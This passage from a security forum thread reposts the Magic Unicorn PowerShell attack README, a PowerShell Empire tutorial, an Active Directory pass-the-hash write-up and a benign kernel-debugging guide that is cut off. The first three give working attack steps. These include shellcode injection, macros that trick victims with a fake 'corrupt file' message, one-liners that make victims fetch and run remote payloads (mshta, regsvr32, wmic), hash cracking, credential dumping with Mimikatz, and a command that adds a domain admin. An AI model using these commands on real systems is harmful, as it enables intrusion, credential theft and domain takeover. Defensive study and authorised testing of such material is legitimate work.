    unicorn Written by: Dave Kennedy (@HackingDave) Website: https://www.trustedsec.com Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit. root@rel1k:~/Desktop# python unicorn.py ,/ // ,// ___ /| |// `__/\_ --(/|___/-/ \|\_-\___ __-_`- /-/ \. |\_-___,-\_____--/_)' ) \ \ -_ / __ \( `( __`\| `\__| |\)\ ) /(/| ,._____., ',--//-| \ | ' / / __. \, / /,---| \ / / / _. \ \ `/`_/ _,' | | | | ( ( \ | ,/\'__/'/ | | | \ \`--, `_/_------______/ \( )/ | | \ \_. \, \___/\ | | \_ \ \ \ \ \ \_ \ \ / \ \ \ \._ \__ \_| | \ \ \___ \ \ | \ \__ \__ \ \_ | \ | | \_____ \ ____ | | | \ \__ ---' .__\ | | | \ \__ --- / ) | \ / \ \____/ / ()( \ `---_ /| \__________/(,--__ \_________. | ./ | | \ \ `---_\--, \ \_,./ | | \ \_ ` \ /`---_______-\ \\ / \ \.___,`| / \ \\ \ \ | \_ \| \ ( |: | \ \ \ | / / | ; \ \ \ \ ( `_' \ | \. \ \. \ `__/ | | \ \ \. \ | | \ \ \ \ ( ) \ | \ | | | | \ \ \ I ` ( __; ( _; ('-_'; |___\ \___: \___: aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc= -------------------- Magic Unicorn Attack Vector ----------------------------- Native x86 powershell injection attacks on any Windows platform. Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Credits: Matthew Graeber, Justin Elze, Chris Gates Happy Magic Unicorns. Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde CRT Example: python unicorn.py <path_to_payload/exe_encode> crt Custom PS1 Example: python unicorn.py <path to ps1 file> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500 Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format) Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00) Help Menu: python unicorn.py --help -----POWERSHELL ATTACK INSTRUCTIONS---- Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute. Note that you will need to have a listener enabled in order to capture the attack. -----MACRO ATTACK INSTRUCTIONS---- For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run. Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. You should get a shell through powershell injection after that. If you are deploying this against Office365/2016+ versions of Word you need to modify the first line of the output from: Sub Auto_Open() To: Sub AutoOpen() The name of the macro itself must also be "AutoOpen" instead of the legacy "Auto_Open" naming scheme. NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR WILL HAPPEN! -----HTA ATTACK INSTRUCTIONS---- The HTA attack will automatically generate two files, the first the index.html which tells the browser to use Launcher.hta which contains the malicious powershell injection code. All files are exported to the hta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the last, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit. A user must click allow and accept when using the HTA attack in order for the powershell injection to work properly. -----CERUTIL Attack Instruction---- The certutil attack vector was identified by Matthew Graeber (@mattifestation) which allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. This should work on virtually any system and allow you to transfer a binary to the victim machine through a fake certificate file. To use this attack, simply place an executable in the path of unicorn and run python unicorn.py <exe_name> crt in order to get the base64 output. Once that's finished, go to decode_attack/ folder which contains the files. The bat file is a command that can be run in a windows machine to convert it back to a binary. -----Custom PS1 Attack Instructions---- This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro. Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by VBA. You may change the number of characters in each VBA string by passing an integer as a parameter. Examples: python unicorn.py harmless.ps1 python unicorn.py myfile.ps1 macro python unicorn.py muahahaha.ps1 macro 500 The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA. -----DDE Office COM Attack Instructions---- This attack vector will generate the DDEAUTO formulate to place into Word or Excel. The COM object DDEInitilize and DDEExecute allow for formulas to be created directly within Office which causes the ability to gain remote code execution without the need of macros. This attack was documented and full instructions can be found at: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ In order to use this attack, run the following examples: python unicorn.py dde python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde Once generated, a powershell_attack.txt will be generated which contains the Office code, and the unicorn.rc file which is the listener component which can be called by msfconsole -r unicorn.rc to handle the listener for the payload. In addition a download.ps1 will be exported as well (explained in the latter section). In order to apply the payload, as an example (from sensepost article): Open Word Insert tab -> Quick Parts -> Field Choose = (Formula) and click ok. Once the field is inserted, you should now see "!Unexpected End of Formula" Right-click the Field, choose "Toggle Field Codes" Paste in the code from Unicorn Save the Word document. Once the office document is opened, you should receive a shell through powershell injection. Note that DDE is limited on char size and we need to use Invoke-Expression (IEX) as the method to download. The DDE attack will attempt to download download.ps1 which is our powershell injection attack since we are limited to size restrictions. You will need to move the download.ps1 to a location that is accessible by the victim machine. This means that you need to host the download.ps1 in an Apache2 directory that it has access to. You may notice that some of the commands use "{ QUOTE" these are ways of masking specific commands which is documented here: http://staaldraad.github.io/2017/10/23/msword-field-codes/. In this case we are changing WindowsPowerShell, powershell.exe, and IEX to avoid detection. Also check out the URL as it has some great methods for not calling DDE at all. -----Import Cobalt Strike Beacon---- This method will import direct Cobalt Strike Beacon shellcode directly from Cobalt Strike. Within Cobalt Strike, export the Cobalt Strike "CS" (C#) export and save it to a file. For example, call the file, cobalt_strike_file.cs. The export code will look something like this: length: 836 bytes */ byte[] buf = new byte[836] { 0xfc, etc Next, for usage: python unicorn.py cobalt_strike_file.cs cs The cs argument tells Unicorn that you want to use the Cobalt strike functionality. The rest is Magic. Next simply copy the powershell command to something you have the ability for remote command execution. NOTE: THE FILE MUST BE EXPORTED IN THE C# (CS) FORMAT WITHIN COBALT STRIKE TO PARSE PROPERLY. There are some caveats with this attack. Note that the payload size will be a little over 14k+ in byte size. That means that from a command line argument perspective if you copy and paste you will hit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue, however if you are launching directly from PowerShell or other normal applications this is a non-problem. A couple examples here, wscript.shell and powershell uses USHORT - 65535 / 2 = 32767 size limit: typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; For this attack if you are launching directly from powershell, VBSCript (WSCRIPT.SHELL), there is no issues. -----Custom Shellcode Generation Method---- This method will allow you to insert your own shellcode into the Unicorn attack. The PowerShell code will increase the stack side of the powershell.exe (through VirtualAlloc) and inject it into memory. Note that in order for this to work, your txt file that you point Unicorn to must be formatted in the following format or it will not work: 0x00,0x00,0x00 and so on. Also note that there is size restrictions. The total length size of the PowerShell command cannot exceed the size of 8191. This is the max command line argument size limit in Windows. Usage: python uniocrn.py shellcode_formatted_properly.txt shellcode Next simply copy the powershell command to something you have the ability for remote command execution. NOTE: THE FILE MUST PROPERLY BE FORMATTED IN A 0x00,0x00,0x00 TYPE FORMAT WITH NOTHING ELSE OTHER THAN YOUR SHELLCODE IN THE TXT FILE. There are some caveats with this attack. Note that if your payload size is large in nature it will not fit in cmd.exe. That means that from a command line argument perspective if you copy and paste you will hit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue, however if you are launching directly from PowerShell or other normal applications this is a non-problem. A couple examples here, wscript.shell and powershell uses USHORT - 65535 / 2 = 32767 size limit: typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; For this attack if you are launching directly from powershell, VBSCript (WSCRIPT.SHELL), there is no issues. -----SettingContent-ms Extension Method---- First, if you haven't had a chance, head over to the awesome SpectreOps blog from Matt Nelson (enigma0x3): https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 This method uses a specific file type called ".SettingContent-ms" which allows for the ability for both direct loads from browsers (open + command execution) as well as extension type through embedding in office products. This one specifically will focus on extension type settings for command execution within Unicorn's PowerShell attack vector. There are multiple methods supported with this attack vector. Since there is a limited character size with this attack, the method for deployment is an HTA. For a detailed understanding on weaponizing this attack visit: https://www.trustedsec.com/2018/06/weaponizing-settingcontent/ The steps you'll need to do to complete this attack is generate your .SettingContent-ms file from either a standalone or hta. The HTA method supports Metasploit, Cobalt Strike, and direct shellcode attacks. The four methods below on usage: HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms HTA Example SettingContent-ms: python unicorn.py <cobalt_strike_file.cs cs ms HTA Example SettingContent-ms: python unicorn.py <patth_to_shellcode.txt>: shellcode ms Generate .SettingContent-ms: python unicorn.py ms The first is a Metasploit payload, the second a Cobalt Strike, the third your own shellcode, and the fourth just a blank .SettingContent-ms file. When everything is generated, it will export a file called Standalone_NoASR.SettingContent-ms either in the default root Unicorn directory (if using the standalone file generation) or under the hta_attack/ folder. You will need to edit the Standalone_NoASR.SettingContent-ms file and replace: REPLACECOOLSTUFFHERE With: mshta http://<apache_server_ip_or_dns_name/Launcher.hta. Then move the contents of the hta_attack to /var/www/html. Once the victim either clicks the .SettingContent-ms file, mshta will be called on the victim machine then download the Unicorn HTA file which has the code execution capabilites. Special thanks and kudos to Matt Nelson for the awesome research Also check out: https://www.trustedsec.com/2018/06/weaponizing-settingcontent/ Usage: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms python unicorn.py <cobalt_strike_file.cs cs ms python unicorn.py <patth_to_shellcode.txt>: shellcode ms python unicorn.py ms Sursa: https://github.com/trustedsec/unicorn
  21. Multiple Ways to Exploiting Windows PC using PowerShell Empire posted in Penetration Testing on February 4, 2019 by Raj Chandel SHARE This is our second post in the article series ‘PowerShell Empire’. In this article we will cover all the exploits that leads to windows exploitation with empire. To our first post on empire series, which gives a basic guide to navigate your way through empire, click here. Table of content: Exploiting through HTA Exploiting through MSBuild.exe Exploiting through regsvr32 XSL exploit Exploiting through visual basic script BAT exploit Multi_launcher exploit Exploiting through HTA This attack helps us to exploit windows through .hta. when .hta file is run via mshta.exe it executes as .exe file with similar functionality which lets us hack our way through. To know more about this attack please click here. To run type ‘./Empire’. According to the work flow, firstly, we have to create a listener to listen on our local machine. Type the following command: listeners 1 listeners After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now. So in this listener interface, type : uselistener http set Host http://192.168.1.107 execute 1 2 3 uselistener http set Host http://192.168.1.107 execute Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type : usestager windows/hta set Listener http set OutFile /root/1.hta execute 1 2 3 4 usestager windows/hta set Listener http set OutFile /root/1.hta execute Running the above commands will create an .hta file to be used as malware. Start the python server using the following command, in order to share our .hta file: python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 As the python server is up and running, type the following command in victims’ command prompt to execute our malicious file: mshta.exe http:/192.168.1.107:8080/1.hta 1 mshta.exe http:/192.168.1.107:8080/1.hta The moment above command is executed you will have your session, to access the session type : interact XDGM6HLE sysinfo 1 2 interact XDGM6HLE sysinfo Exploiting through MSBuild.exe Our next exploit is via MSBuild.exe, which will let you have a remote session of windows using XML file. To know in details about this attack please click here. And to use this exploit type: listeners uselistener http set Host http:/192.168.1.107 execute 1 2 3 4 listeners uselistener http set Host http:/192.168.1.107 execute This creates a listener, type ‘back’ to go in listener interface to create a exploit. For this, type : usestager windows/launcher_xml set Listener http execute 1 2 3 usestager windows/launcher_xml set Listener http execute Now, an .xml file is created in /tmp. Copy this file in victims’ PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it typing combination of following commands: cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml 1 2 cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml So, this way you will have your session, to access the said session type : interact A8H14C7L sysinfo 1 2 interact A8H14C7L sysinfo Exploiting through regsvr32 Our next method is exploiting through regsvr32. To know in detail about this attack, do click here. As always, we have to create a listener first to listen on our local machine. Type the following command: listeners uselistener http set Host http://192.168.1.107 execute 1 2 3 4 listeners uselistener http set Host http://192.168.1.107 execute Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type: usestager windows/launcher_sct set Listener http execute 1 2 3 usestager windows/launcher_sct set Listener http execute This will create a .sct file in /tmp. Share this file to victim’s PC using python server and then run this file in run window of victims’ PC by typing the following command: regsvr /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll 1 regsvr /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll Thus, you will have an active session. To access the session type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through XSL XSL is a language will helps you format data, this also describes how web server will interact with using XML. Our next method of attack with empire is by exploiting .xsl file. For this method lets activate our listener first by typing : listeners uselistener http set Host http://192.168.1.107 execute 1 2 3 4 listeners uselistener http set Host http://192.168.1.107 execute As the listener is up and running, create your exploit : usestager windows/launcher_xsl set Listener http execute 1 2 3 usestager windows/launcher_xsl set Listener http execute This way .xsl file is created. Now run the python server from the folder where the .xsl file is created as shown in the image below : cd /tmp python -m SimpleHTTPServer 8080 1 2 cd /tmp python -m SimpleHTTPServer 8080 Now execute the following command in the command prompt of your victim: wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl" 1 wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl" Running above will give a session, to access the session type : interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through Visual Basic script Our next method is to create a malicious VBS file and exploiting our victim through it. Like always, let’s create a listener first. listeners uselistener http set Host http://192.168.1.107 execute 1 2 3 4 listeners uselistener http set Host http://192.168.1.107 execute Now, to create our malicious .vbs file type : usestager windows/launcher_vbs set Listener http execute 1 2 3 usestager windows/launcher_vbs set Listener http execute Next step is to start the python server by typing: python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 Once the .vbs file is shared through python server and executed in the victim’s PC you will have you r session and just like before to access the session type : interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through .bat In this method, we will exploit through .bat file. Like our previous exploits, this time too, let’s create a listener. For this, type: listeners uselistener http set Host http://192.168.1.107 execute back 1 2 3 4 5 listeners uselistener http set Host http://192.168.1.107 execute back The above commands will create a listener for you. Let’s create our .bat file using following command : usestager windows/launcher_bat use Listener http set OutFile /root/1.bat execute 1 2 3 4 usestager windows/launcher_bat use Listener http set OutFile /root/1.bat execute As shown, the above commands will create a .bat file. Start up the python server by using following command to allow you share you .bat file on your victim’s pc. python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 Once you run the .bat file, a session will activate. To access the session type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Multi_launcher This is our last method of this post. It can be used on various platforms such as windows, linux, etc. again, even for this method, create a listener: listerners uselistener http set Host http://192.168.1.107 execute 1 2 3 4 listerners uselistener http set Host http://192.168.1.107 execute Then type following commands for create your malicious file: usestager multi/launcher set listerner http execute 1 2 3 usestager multi/launcher set listerner http execute Once you hit enter after the above commands, it will give you a code. Copy this code and paste it in the command prompt of victim and hit enter. As soon as you hit enter, you will have activated a session. To access the session, type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Conclusion The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy! Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here ABOUT THE AUTHOR Raj Chandel Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of quality Experience in IT and software industry Sursa: https://www.hackingarticles.in/multiple-ways-to-exploiting-windows-pc-using-powershell-empire/
      • 3
      • Upvote
  22. Gaining Domain Admin from Outside Active Directory Mar 4, 2018 …or why you should ensure all Windows machines are domain joined. This is my first non-web post on my blog. I’m traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, initially part time and now full time, Active Directory testing has become my favourite type of penetration test. This post is regarding an internal network test for a client I did earlier in the year. This client’s network is a tough nut to crack, and one I’ve tested before so I was kind of apprehensive of going back to do this test for them in case I came away without having “hacked in”. We had only just managed it the previous time. The first thing I run on an internal is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this fact from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there’s no point in breaking in through a skylight if the front door is open. So I ran Responder, and I was surprised to see the following hash captured: Note of course, that I would never reveal client confidential information on my blog, therefore everything you see here is anonymised and recreated in the lab with details changed. Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK. Checking this host’s NetBIOS information with Crack Map Exec (other tools are available), we can check whether this is a local account hash. If it is, the “domain” part of the username: [SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK i.e. 2-FD-87622 should match the host’s NetBIOS name if this is the case. Looking up the IP with CME we can see the name of the host matches: So the next port of call we try to crack this hash and gain the plaintext password. Hashcat was loaded against rockyou.txt and rules, and quickly cracked the password. hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule Now we have a set of credentials for the front desk machine. Hitting the machine again with CME but this time passing the cracked credentials: cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth We can see Pwn3d! in the output showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes: cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam Note we can see FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f::: This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 “challenge/response” hash that Responder caught earlier. Responder catches hashes over the wire, and these are different to the format that Windows stores in the SAM. The next step was to try the local administrator hash and spray it against the client’s server range. Note that we don’t even have to crack this administrator password, we can simply “pass-the-hash”: cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an “SMB relay” attack instead). To our surprise, it got a hit, the local administrator password had been reused on the STEWIE machine. Querying this host’s NetBIOS info: $ cme smb 172.16.157.134 SMB 172.16.157.134 445 STEWIE [*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE) (signing:False) (SMBv1:True) We can see it is a member of the MACFARLANE domain, the main domain of the client’s Active Directory. So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM as the password which will cause Metasploit to pass-the-hash. Once ran, our shell is gained: We can load the Mimikatz module and read Windows memory to find passwords: Looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely for a POC for our pentest, in real life or to remain more stealthy we could just use the discovered account). cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add' Note the use of the undocumented /y function to suppress the prompt Windows gives you for adding a password longer than 14 characters. A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation: So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn’t have gained the initial access to it and leveraged its secrets in order to compromise the whole domain. Of course there are other mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here). Sursa: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html
      • 1
      • Upvote
  23. Single-stepping through the Kernel Feb 3, 2019 tech linux kernel There may come a time in a system programmer’s life where she needs to leave the civilized safety of the userland and confront the unspeakable horrors that dwell in the depths of the Kernel space. While higher beings might pour scorn on the very idea of a Kernel debugger, us lesser mortals may have no other recourse but to single-step through Kernel code when the rivers begin to run dry. This guide will help you do just that. We hope you never actually have to. Ominous sounding intro-bait notwithstanding, setting up a virtual machine for Kernel debugging isn’t really that difficult. It only needs a bit of preparation. If you just want a copypasta, skip to the end. If you’re interested in the predicaments involved and how to deal with them, read on. N.B.: “But which kernel are you talking about?”, some heathens may invariably ask when it is obvious that Kernel with a capital K refers to the One True Kernel. Building the Kernel Using a minimal Kernel configuration instead of the kitchen-sink one that distributions usually ship will make life a lot easier. You will first need to grab the source code for the Kernel you are interested in. We will use the latest Kernel release tarball from kernel.org, which at the time of writing is 4.20.6. Inside the extracted source directory, invoke the following: make defconfig make kvmconfig make -j4 This will build a minimal Kernel image that can be booted in QEMU like so: qemu-system-x86_64 -kernel linux-4.20.6/arch/x86/boot/bzImage This should bring up an ancient-looking window with a cryptic error message: You could try pasting the error message into Google a search engine: Except for the fact that you can’t select the text in the window. And frankly, the window just looks annoying! So, ignoring the actual error for a moment, let’s try to get QEMU to print to the console instead of a spawning a new graphical window: qemu-system-x86_64 -kernel -nographic linux-4.20.6/arch/x86/boot/bzImage QEMU spits out a single line: qemu-system-x86_64: warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5] Htop tells me QEMU is using 100% of a CPU and my laptop fan agrees. But there is no output whatsoever and Ctrl-c doesn’t work! What does work, however, is pressing Ctrl-a and then hitting x: QEMU: Terminated Turns out that by passing -nographic, we have plugged out QEMU’s virtual monitor. Now, to actually see any output, we need to tell the Kernel to write to a serial port: qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -append "console=ttyS0" It worked! Now we can read error message in all its glory: [ 1.333008] VFS: Cannot open root device "(null)" or unknown-block(0,0): error -6 [ 1.334024] Please append a correct "root=" boot option; here are the available partitions: [ 1.335152] 0b00 1048575 sr0 [ 1.335153] driver: sr [ 1.335996] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0) [ 1.337104] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 4.20.6 #1 [ 1.337901] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014 [ 1.339091] Call Trace: [ 1.339437] dump_stack+0x46/0x5b [ 1.339888] panic+0xf3/0x248 [ 1.340295] mount_block_root+0x184/0x248 [ 1.340838] ? set_debug_rodata+0xc/0xc [ 1.341357] mount_root+0x121/0x13f [ 1.341837] prepare_namespace+0x130/0x166 [ 1.342378] kernel_init_freeable+0x1ed/0x1ff [ 1.342965] ? rest_init+0xb0/0xb0 [ 1.343427] kernel_init+0x5/0x100 [ 1.343888] ret_from_fork+0x35/0x40 [ 1.344526] Kernel Offset: 0x1200000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff) [ 1.345956] ---[ end Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0) ]--- So, the Kernel didn’t find a root filesystem to kick off the user mode and panicked. Lets fix that by creating a root filesystem image. Creating a Root Filesystem Start by creating an empty image: qemu-img create rootfs.img 1G And then format it as ext4 and mount it: mkfs.ext4 rootfs.img mkdir mnt sudo mount -o loop rootfs.img mnt/ Now we can populate it using debootstrap: sudo debootstrap bionic mnt/ This will create a root filesystem based on Ubuntu 18.04 Bionic Beaver. Of course, feel free to replace bionic with any release that you prefer. And unmount the filesystem once we’re done. This is important if you want to avoid corrupted images! sudo umount mnt Now boot the Kernel with our filesystem. We need to tell QEMU to use our image as a virtual hard drive and we also need to tell the Kernel to use the hard drive as the root filesystem: qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda console=ttyS0" This time the Kernel shouldn’t panic and you should eventually see a login prompt. We could have setup a user while creating the filesystem but it’s annoying to have to login each time we boot up the VM. Let’s enable auto login as root instead. Terminate QEMU (Ctrl-c, x), mount the filesystem image again and then create the configuration folder structure: sudo mount -o loop rootfs.img mnt/ sudo mkdir -p mnt/etc/systemd/system/serial-getty@ttyS0.service.d Add the following lines to mnt/etc/systemd/system/serial-getty@ttyS0.service.d/autologin.conf: [Service] ExecStart= ExecStart=-/sbin/agetty --noissue --autologin root %I $TERM Type=idle Make sure to unmount the filesystem and then boot the Kernel again. This time you should be automatically logged in. Gracefully shutdown the VM: halt -p Attaching a debugger Let’s rebuild the Kernel with debugging symbols enabled: ./scripts/config -e CONFIG_DEBUG_INFO make -j4 Now, boot the Kernel again, this time passing the -s flag which will make QEMU listen on TCP port 1234: qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda console=ttyS0" -s Now, in another terminal start gdb and attach to QEMU: gdb ./linux-4.20.6/vmlinux ... Reading symbols from ./linux-4.20.6/vmlinux...done. (gdb) target remote :1234 Remote debugging using :1234 0xffffffff95a2f8f4 in ?? () (gdb) You can set a breakpoint on Kernel function, for instance do_sys_open(): (gdb) b do_sys_open Breakpoint 1 at 0xffffffff811b2720: file fs/open.c, line 1049. (gdb) c Continuing. Now try opening a file in VM which should result in do_sys_open() getting invoked… And nothing happens?! The breakpoint in gdb is not hit. This due to a Kernel security feature called KASLR. KASLR can be disabled at boot time by adding nokaslr to the Kernel command line arguments. But, let’s actually rebuild the Kernel without KASLR. While we are at it, let’s also disable loadable module support as well which will save us the trouble of copying the modules to the filesystem. ./scripts/config -e CONFIG_DEBUG_INFO -d CONFIG_RANDOMIZE_BASE -d CONFIG_MODULES make olddefconfig # Resolve dependencies make -j4 Reboot the Kernel again, attach gdb, set a breakpoint on do_sys_open() and run cat /etc/issue in the guest. This time the breakpoint should be hit. But probably not where you expected: Breakpoint 1, do_sys_open (dfd=-100, filename=0x7f96074ad428 "/etc/ld.so.cache", flags=557056, mode=0) at fs/open.c:1049 1049 { (gdb) c Continuing. Breakpoint 1, do_sys_open (dfd=-100, filename=0x7f96076b5dd0 "/lib/x86_64-linux-gnu/libc.so.6", flags=557056, mode=0) at fs/open.c:1049 1049 { (gdb) c Continuing. Breakpoint 1, do_sys_open (dfd=-100, filename=0x7ffe9e630e8e "/etc/issue", flags=32768, mode=0) at fs/open.c:1049 1049 { (gdb) Congratulations! From this point, you can single-step away to your heart’s content. By default, the root filesystem is mounted read only. If you want to be able to write to it, add rw after root=/dev/sda in the Kernel parameters: qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s Bonus: Networking You can create a point to point link between the QEMU VM and the host using a TAP interface. First install tunctl and create a persistent TAP interface to avoid running QEMU as root: sudo apt install uml-utilities sudo sudo tunctl -u $(id -u) Set 'tap0' persistent and owned by uid 1000 sudo ip link set tap0 up Now launch QEMU with a virtual e1000 virtual interface connected the host’s tap0 interface: qemu-system-x86_64 -nographic -device e1000,netdev=net0 -netdev tap,id=net0,ifname=tap0 -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s Once the guest boots up, bring the network interface up: ip link set enp0s3 up ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff inet6 fe80::5054:ff:fe12:3456/64 scope link valid_lft forever preferred_lft forever QEMU and the host can now communicate using their IPv6 Link-local addresses. After all, it is 2019. Copypasta # Building a minimal debuggable Kernel make defconfig make kvmconfig ./scripts/config -e CONFIG_DEBUG_INFO -d CONFIG_RANDOMIZE_BASE -d CONFIG_MODULES make olddefconfig make -j4 # Create root filesystem 